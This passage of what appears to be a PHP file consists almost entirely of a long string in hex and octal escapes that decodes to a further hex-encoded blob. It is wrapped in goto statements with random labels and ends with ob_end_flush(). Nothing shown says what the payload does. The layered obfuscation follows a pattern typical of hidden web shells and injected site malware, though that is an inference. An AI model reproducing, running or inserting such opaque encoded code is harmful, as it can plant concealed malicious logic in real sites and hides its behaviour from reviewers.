4\x37\x66\64\60\71\x63\63\67\x61\143\x30\142\143\x38\144\x37\65\x34\x35\x65\x35\x31\x34\x65\141\x35\x30\x30\142\145\61\x36\61\65\62\x37\70\x34\141\142\x37\x64\64\x61\x31\143\60\144\x66\67\x39\60\64\141\x61\x65\143\x36\x62\x36\x63\64\x62\143\65\x65\x61\67\142\66\x32\61\141\145\x62\66\64\x30\x38\x62\64\x32\x36\x35\x63\x37\x30\x38\70\142\63\x39\x62\x37\x61\x31\71\x34\62\63\142\x66\67\x30\71\x34\x63\142\x35\x37\x38\x30\60\142\145\x64\x65\x34\x32\x33\70\x64\146\x62\x32\x38\70\x32\x39\x32\x33\67\x66\x34\x39\61\143\64\64\70\141\x38\67\145\x31\60\142\71\141\x30\x37\x37\x32\145\70\x66\x63\145\x34\63\x35\x63\60\x31\62\x39\60\x30\63\144\x65\144\x66\x62\60\145\65\64\143\70\x30\x63\x66\x65\60\62\145\x64\x35\x64\145\x30\142\x34\67\x33\x34\x65\61\143\x63\x34\x66\x31\66\71\x38\x33\x39\x65\71\62\63\70\63\x35\x66\61\x66\x66\144\x34\71\71\x38\x64\60\143\60\x63\x65\x37\145\x64\x66\x62\x37\x38\x31\x65\x32\x33\62\65\x30\x37\143\x61\63\70\66\x33\143\146\x62\x37\70\x33\x63\64\67\x34\146\64\145\x35\62\63\x35\x31\x65\143\61\70\64\x66\142\70\61\x64\x37\x32\x37\x61\146\142\142\70\x37\x36\145\x38\70\70\60\x30\x33\65\62\x64\143\x64\x32\x35\65\x35\62\x62\146\x35\70\x61\65\x34\71\x63\x38\66\65\65\145\x30\145\60\145\143\x64\143\60\x37\64\66\x37\67\143\71\63\145\x33\x34\x31\x64\142\70\143\x38\62\143\x61\x65\x39\145\x62\x66\60\x65\146\62\63\146\x35\x63\x31\x63\x33\x32\63\70\x63\62\x62\x63\x63\67\x36\x33\71\143\x61\71\63\x65\146\66\x61\61\x34\x39\x65\62\x61\145\145\x37\144\x65\x66\x36\71\144\x37\x34\63\x35\x61\61\145\141\65\x61\x39\x36\x31\63\x36\63\x37\x62\146\x37\65\63\x33\146\x63\x65\x30\x39\x33\61\65\142\x63\62\x61\x35\60\x33\71\x35\x34\x37\70\x37\x32\x39\67\62\x39\62\63\144\x39\x35\67\x35\x63\x39\x35\x63\x64\x34\60\70\x34\144\x37\62\66\x33\x64\143\65\x38\x65\x63\143\70\143\144\61\141\x38\x31\142\146\x37\x35\x30\x63\x33\65\70\144\x39\x38\x35\146\60\63\x33\61\x30\x64\66\x63\144\62\71\65\144\x31\x39\x37\146\x36\x36\142\x64\x35\x64\x33\x38\x33\x31\x35\x62\141\67\x61\67\61\66\144\62\x30\146\x36\142\x66\x34\x34\x37\x35\143\x36\143\61\61\63\x62\x66\143\62\x30\x39\146\x62\x37\62\x37\71\x31\x64\64\70\x35\x37\142\144\145\x36\x34\61\144\x31\x61\144\66\x63\x63\x39\146\x63\x38\x36\x38\61\61\67\x39\64\143\x32\x39\x61\x33\x32\x62\64\65\x39\144\63\x36\71\71\x35\71\x36\142\142\64\x64\67\x38\71\x66\71\x31\x38\143\61\63\x32\x64\60\145\71\x39\x64\x62\x34\71\143\x62\141\145\141\x61\63\141\67\x63\x31\x35\x63\60\x33\x32\x36\x66\x64\67\143\146\70\62\x33\71\x66\x30\70\145\x66\62\146\63\x37\x30\x63\141\64\70\64\x62\143\67\x63\x31\144\x33\63\71\x30\71\67\x61\x61\x35\x62\63\x35\70\x35\x66\60\67\145\x35\66\x38\x32\x33\x32\60\x63\141\x38\x32\60\x63\145\71\62\62\x37\x63\66\65\x65\x30\62\x66\x30\143\x38\x30\x34\65\x66\x37\x35\x65\x38\x64\x62\x64\146\144\x32\x39\65\61\64\x33\70\x63\x33\x63\x64\x61\x30\x39\67\60\x39\x62\x65\x66\67\65\x35\x36\x36\x62\61\x64\x37\x64\66\62\x35\62\143\143\142\146\143\x37\145\60\62\62\x39\x66\x32\x34\142\145\62\64\65\71\141\x35\x64\145\66\x32\141\144\61\x62\142\71\66\63\x32\x63\141\x61\66\x62\x64\x31\62\x64\x63\144\x39\60\143\x31\144\144\64\67\x38\142\x34\x64\70\141\x31\62\x63\146\65\x37\142\145\63\63\x66\x61\x33\67\64\x38\x66\143\64\64\x39\144\x37\x35\x39\144\x35\x39\141\64\144\x66\142\x39\64\x30\63\x61\x34\x66\142\70\66\x66\x61\x62\x64\143\60\x38\67\70\x39\144\67\x64\x35\x32\x64\x31\x33\x37\x38\65\x37\x33\x34\x66\x36\x65\x66\146\67\x33\145\61\x65\143\64\142\66\x65\x34\x65\144\60\x35\x34\146\x39\x66\x33\61\71\x63\141\x38\61\x31\x33\145\x63\71\x38\x36\x39\62\142\x39\66\x39\x66\142\70\x30\x33\x34\142\x36\67\x33\x37\x31\x37\63\x63\142\61\x62\x66\x65\67\60\64\67\66\61\x66\142\66\x65\x38\x63\x32\70\145\144\66\146\x61\x31\x36\144\x33\x30\71\66\x33\x33\67\x64\145\60\x61\x36\144\67\x65\x32\x35\x30\61\x65\142\x39\x66\71\65\144\x65\x39\x37\64\x37\144\x64\61\146\x36\62\x30\x30\x62\x32\60\146\67\146\x38\67\141\142\x34\71\x61\x66\x65\x32\x31\x32\141\70\x36\x36\x30\x65\142\65\61\146\x35\143\x39\x62\x63\x63\63\71\142\62\71\145\x32\x32\x62\145\x66\x62\61\x62\67\x33\x34\x64\145\x62\65\x31\x35\x38\145\142\143\x34\x33\x39\143\x65\146\x38\67\x35\66\x63\144\62\61\142\x63\146\x35\62\61\66\145\x37\x36\145\64\66\x63\145\x63\60\x64\63\145\146\x34\x65\70\x38\65\x36\63\60\x63\71\x63\65\x30\142\x38\x37\67\x37\60\x30\x36\70\x39\64\x66\67\x61\x65\141\x30\145\142\x66\x34\x66\144\143\x30\x35\x39\x33\x35\x62\146\x61\x30\60\x39\66\x35\65\x37\x65\x38\63\x30\x37\66\65\x36\x30\x64\x39\62\x30\142\144\141\x61\70\x35\142\x65\x62\63\143\142\70\x63\142\x32\x61\143\x34\x33\x39\70\65\62\66\x63\65\146\x38\x37\x39\x39\x66\142\x64\x34\141\142\144\x62\143\x33\144\x63\63\x39\71\x63\146\x61\x61\x32\x32\x65\61\141\x33\64\x66\x65\143\145\66\x66\x63\70\x39\64\146\62\x62\x38\x33\x30\x61\x61\71\x38\x34\x32\70\x31\142\x30\61\60\67\142\x65\64\x38\x65\63\143\x37\x36\142\x63\60\x66\64\62\x35\143\145\70\61\144\67\146\146\x62\145\145\x61\x32\67\65\67\x63\61\x33\x64\62\64\61\x65\70\70\x35\144\x65\x38\61\70\x30\x31\x31\x64\x34\x64\63\67\x63\x34\63\x64\66\x36\70\x61\145\x33\60\x61\x65\x63\143\x32\143\x36\146\141\67\145\141\142\x33\x37\x62\x65\x63\67\x38\x30\143\x39\x32\x63\63\x61\x39\64\x33\x30\146\143\143\66\61\62\71\144\141\60\60\x61\67\x66\x34\x36\142\62\61\62\143\61\63\x31\63\61\x31\70\70\143\63\60\146\141\67\x38\70\146\x61\x30\x62\144\65\x36\61\x33\x37\141\62\x34\65\x35\x30\71\146\70\x34\x65\144\x30\x39\67\x35\62\x31\x36\71\x64\144\143\70\65\65\143\x38\x37\x64\x61\70\142\146\x36\145\63\65\x64\x30\143\61\x63\143\x31\x38\x30\x36\x61\62\x65\61\143\x65\x34\66\62\x63\142\143\62\x64\x39\x32\141\x66\146\70\60\145\62\142\65\x39\65\142\143\141\71\x38\x32\146\142\145\145\60\66\x37\143\145\x32\145\70\144\x66\143\144\64\x39\x39\x39\66\60\x62\142\65\146\71\145\x31\67\146\67\145\61\70\141\x35\x32\141\x39\66\65\x35\145\x32\x37\142\67\146\63\142\66\146\x63\x63\x31\146\x30\62\144\x39\x37\x61\x31\x62\67\x62\60\x31\145\63\144\x64\x30\141\x63\66\x38\x37\63\x35\x63\142\x30\x30\60\67\66\x65\x66\x65\x63\x62\67\66\61\x30\x61\60\x34\65\70\64\143\66\146\71\64\64\70\142\64\x34\145\146\67\65\63\70\142\x37\144\x32\x63\145\61\60\x65\x33\x38\71\x39\x37\144\71\x37\65\x34\66\143\62\145\x37\x39\70\146\x30\64\x33\62\x39\x37\141\x65\x39\x66\61\142\x35\x30\x39\x37\x31\145\x38\62\x30\x37\x34\144\146\x37\63\x32\x33\x37\x61\x37\66\x34\x64\70\67\x64\145\63\70\146\66\144\x35\x37\x62\145\70\x61\x61\62\x38\x34\x64\x33\x62\x31\x37\60\60\144\x64\63\x63\x64\x66\143\x33\71\61\63\x37\x34\60\x34\71\x35\x37\x31\60\70\x35\x65\x63\x35\146\x65\70\141\142\x37\145\x37\x62\71\x36\146\61\146\142\x37\71\x38\66\146\66\x66\x33\x34\141\71\x35\x36\143\71\x62\x65\67\141\x30\142\145\x31\141\62\x30\145\x62\67\x65\x39\x66\70\x66\67\x62\x38\63\63\x39\71\x31\x61\x38\67\67\x38\x37\x33\64\145\60\x62\x64\64\x35\143\62\144\x38\x35\x35\146\x38\146\141\141\x36\x38\x66\x31\x32\x63\x34\141\66\x35\x32\145\x63\65\71\143\65\67\144\x36\x34\x62\142\x61\x32\x32\x32\x36\144\x64\x33\144\x32\x64\61\145\x66\142\x37\146\x32\70\x32\65\x61\66\67\61\67\x33\x66\64\66\x66\x63\x31\x37\x33\x61\60\141\x39\146\x38\x37\143\x63\x35\x61\x32\x37\x32\x31\x61\141\143\x62\145\x36\71\63\x34\143\x64\141\62\x66\146\x61\x39\x33\63\63\65\x38\x38\144\143\x66\143\x39\x39\71\60\61\144\x66\x62\x39\61\x32\61\x35\70\146\66\x36\63\x30\62\x65\x35\64\x38\145\x62\x37\x32\x61\x32\145\145\70\146\67\x39\x30\x33\146\141\x35\x62\62\61\60\64\x30\x63\x38\x64\x61\x61\x32\x31\64\x32\x62\x38\x65\x33\62\145\x33\x64\x33\66\x31\x33\64\65\64\145\66\60\x37\x62\x64\x61\x32\x62\142\61\61\x62\x36\143\x32\x65\x38\143\145\143\x33\63\x65\x33\61\x63\x34\141\x63\x65\x34\63\x61\x37\x31\70\x63\66\x31\x66\61\145\146\x39\x33\142\x34\x37\x64\x65\64\x66\60\x33\142\x35\x30\64\x33\x65\x61\x65\x32\x65\x64\67\71\x64\x64\x38\x38\62\70\x34\67\143\x63\144\145\x33\x65\x39\x32\64\62\x35\x34\67\x36\x36\64\142\x63\x36\x61\x38\x61\63\x31\71\146\x63\x38\x39\x62\x66\x62\61\x61\x39\65\144\67\x32\144\x31\x62\142\x33\71\66\x35\x63\145\146\60\143\x64\67\141\141\x62\144\x38\x35\143\x31\70\146\143\62\x36\x37\x33\71\x62\60\x30\x30\x63\x38\145\x62\142\x35\64\x39\x33\65\x33\63\64\63\143\60\x65\x66\62\x37\x33\145\146\x32\x32\142\63\64\x33\x65\62\x66\61\64\141\x66\x34\70\x31\65\x33\x63\x62\x66\x65\x35\x65\143\x30\x33\x31\70\x37\63\x36\x32\x36\66\x30\x31\x64\x62\x39\x65\64\x36\61\70\x37\x39\x62\70\61\x62\x65\141\x62\64\62\64\x33\x31\142\141\141\141\145\x38\x65\x31\143\x30\146\71\143\x63\x34\63\x36\141\x64\143\x61\x30\146\x39\61\144\143\x66\x36\66\x32\x63\x33\143\64\x61\x32\x34\x33\66\62\60\64\62\x61\x62\x66\64\146\67\x62\x33\141\143\x35\142\x65\x63\x37\x39\x65\65\145\x37\64\x37\x32\63\x39\x30\144\143\142\142\x38\70\x65\x64\145\61\x31\x65\x34\x61\x37\70\x37\141\x66\x63\x39\145\66\144\x35\67\146\x65\66\62\x65\x62\144\65\141\63\x32\x36\x31\142\70\x38\x62\x62\x65\146\x37\141\146\64\141\63\64\67\x62\x61\x30\141\63\x66\143\146\x64\x32\60\70\x39\x63\71\x32\61\x36\61\x64\x38\x33\x63\66\63\x65\x34\143\x39\62\145\x33\x35\x65\66\x62\71\67\x35\65\x63\x36\x63\x32\x62\64\141\145\142\x39\x37\70\x37\x64\71\x33\x30\x61\142\71\145\x62\146\x65\145\141\71\71\62\146\146\60\145\145\141\x38\70\x37\142\146\62\x38\x62\143\x35\60\x61\x63\x34\x30\146\x34\146\62\64\142\x62\62\x65\65\60\61\x32\x37\141\x62\x32\142\x30\63\x38\x34\x64\x36\64\x35\x33\x39\x36\142\x38\61\61\x32\x35\63\x39\71\141\x32\x66\x61\65\x37\141\x62\64\x38\142\64\63\61\61\144\x62\x33\143\60\x37\70\x32\66\x38\x34\70\143\x64\x39\142\60\65\x63\x34\141\x34\141\x64\71\x62\67\x62\x65\x66\71\63\142\x34\x30\x38\x38\60\146\x32\70\71\x62\63\146\x33\x66\142\x30\144\x33\60\x66\60\146\x36\x37\x36\64\141\144\66\x65\143\x38\x31\71\x34\146\x39\x64\142\x39\x39\141\x61\142\x34\x36\x33\x34\x38\x31\60\141\x61\x65\67\60\x39\64\x35\145\63\x38\141\x32\x65\66\63\62\x38\x35\60\x61\x34\67\x37\142\62\60\x38\x32\70\x37\x32\x66\145\63\x36\x65\x30\64\x35\x30\65\x39\x66\71\x63\142\x30\x36\61\67\65\143\x61\x39\x39\x36\x35\x65\62\62\145\x37\x61\66\142\x64\143\70\67\x37\x32\x62\65\x36\64\144\61\146\x63\64\x38\x35\x66\x35\x66\x33\x66\63\x34\x38\x39\x64\144\x61\x30\x39\71\x35\x64\x33\x63\x37\63\x65\60\144\x63\x38\66\x36\x39\x64\144\64\66\67\x32\144\x31\60\65\x63\141\144\x30\71\64\x35\x64\65\143\62\x37\143\144\x37\71\x63\141\63\x35\x64\142\141\61\61\141\x36\141\x32\62\66\143\70\145\x61\x31\142\143\65\x37\71\x31\70\x37\x64\146\x35\70\x61\71\x36\66\142\x37\x39\x37\x31\142\70\x34\x33\65\61\60\x36\x66\142\x32\64\61\x33\62\x33\66\x35\x36\x65\60\x39\x66\65\144\141\66\70\x33\x38\71\x65\65\65\x31\x62\71\143\141\x62\x65\142\70\x39\65\145\64\64\x34\x30\x39\141\x36\x30\146\x34\71\142\143\63\x31\145\x32\66\x65\143\66\142\71\67\64\x36\x64\x63\146\67\63\70\x32\x34\x63\70\63\144\x64\x64\x62\x34\66\x31\142\62\x66\x64\141\x62\x39\63\141\x35\67\x37\x62\x31\x33\141\144\142\64\67\x62\x37\x62\x37\61\61\67\x61\146\x34\61\67\x63\x36\67\x65\x35\145\141\x37\67\x32\142\x39\70\x37\62\145\x63\145\60\71\66\62\146\x36\146\x36\67\65\65\62\146\146\x65\x64\x62\x66\146\144\x66\x63\146\x63\144\x33\x33\146\146\x63\x36\x65\64\x65\x66\141\141\x37\144\x66\143\x64\x66\61\x34\x33\x39\141\x38\145\x31\60\146\63\x36\x30\x34\x35\x64\x66\x35\60\142\66\146\63\x64\65\x35\x31\64\x31\x66\x39\65\x39\71\x35\66\x64\x35\71\x39\146\65\70\x35\x34\64\x30\62\67\x37\60\x31\66\x36\63\x65\x64\x34\66\142\143\146\71\x34\141\62\x31\70\x66\141\144\x34\65\x32\x64\145\144\62\143\63\70\x66\71\145\60\x66\x65\x34\x65\x35\x35\x30\x35\x38\62\67\x36\146\65\144\144\145\145\x66\142\67\x63\70\x34\145\145\63\142\63\61\x61\71\145\x38\x66\x37\x37\x39\x36\62\71\x62\x30\x31\70\146\x36\67\62\x63\71\65\x37\x62\x31\66\71\67\144\x39\145\x36\66\65\x61\63\x66\141\x66\x31\65\x63\145\x61\x62\142\71\x39\60\x65\x32\x39\x63\x34\145\x31\142\67\x66\67\x66\x30\x31\70\x37\141\x37\x66\64\x36\x36\x33\65\x39\x39\63\64\x36\x30\66\x62\x61\65\x32\x39\66\142\x30\x63\71\64\64\x30\67\x66\x66\x30\x39\64\60\x32\63\141\x30\60\144\145\x61\x35\x65\67\62\x37\x61\144\145\65\x39\66\143\70\145\x35\x62\63\x61\x34\60\60\x33\145\x32\x39\x39\x66\x30\x36\x35\141\61\x34\145\x32\x61\143\x39\x37\71\143\64\x30\x38\x32\x35\x66\x30\x38\62\141\145\x39\145\64\142\60\60\143\x30\x36\x39\x39\63\x38\x64\x30\67\x35\x37\146\x64\142\x64\144\66\x38\62\60\66\x31\x34\x62\x63\x35\145\145\65\x61\x34\x38\144\x36\142\x30\62\64\64\67\143\144\65\x30\61\64\65\64\64\60\x39\71\x64\x30\62\x66\67\x64\61\x63\x30\x62\x62\63\x63\x38\x39\66\x64\x64\143\x61\x39\144\60\146\142\x34\x63\x64\143\145\x31\x32\145\71\x31\x34\x37\143\65\62\63\146\61\65\x64\x38\x35\x61\144\x63\70\x61\x38\x62\x32\x31\67\145\x34\145\x36\64\x34\x30\x39\x37\144\141\x65\x38\x64\x33\x33\65\x36\x35\x33\x63\71\x39\65\61\x63\61\143\x64\x61\x64\x35\70\x62\63\x32\x62\142\70\65\71\62\x36\141\71\60\x32\70\x30\x35\x38\x61\x33\x66\x61\62\x33\x34\66\65\x35\x31\x38\x33\61\143\142\x62\63\x33\62\141\70\x34\71\x32\x31\x64\x33\x35\x34\62\71\x64\x33\x33\71\71\144\x36\x31\143\x64\62\x32\x39\60\x38\x61\65\146\60\x37\x30\x66\63\146\144\142\x38\x65\70\x63\62\x65\x63\71\x65\x35\64\x65\x31\142\71\141\x61\x34\143\64\x63\x32\x31\x39\142\146\x32\x35\71\x30\x32\70\x65\x64\x61\x33\63\x39\143\x31\70\x30\145\61\61\x35\x62\144\x35\146\x32\x63\x37\x66\145\x66\x66\145\67\143\x66\64\146\71\x66\x31\x64\x62\x66\63\146\70\x36\146\x38\146\142\x66\142\x37\71\x66\146\144\x62\x66\x66\146\x61\67\146\146\146\x62\x66\146\144\142\x66\x30\x31\x32\146\x63\x37\63\65\x34\x35"; goto IjvKH; pk35o: eSEqC: goto f_YCP; JlDEq: kFpIy: goto vm_5q; f3YQt: goto kFpIy; goto IfZ46; f_YCP: ob_end_flush(); ?>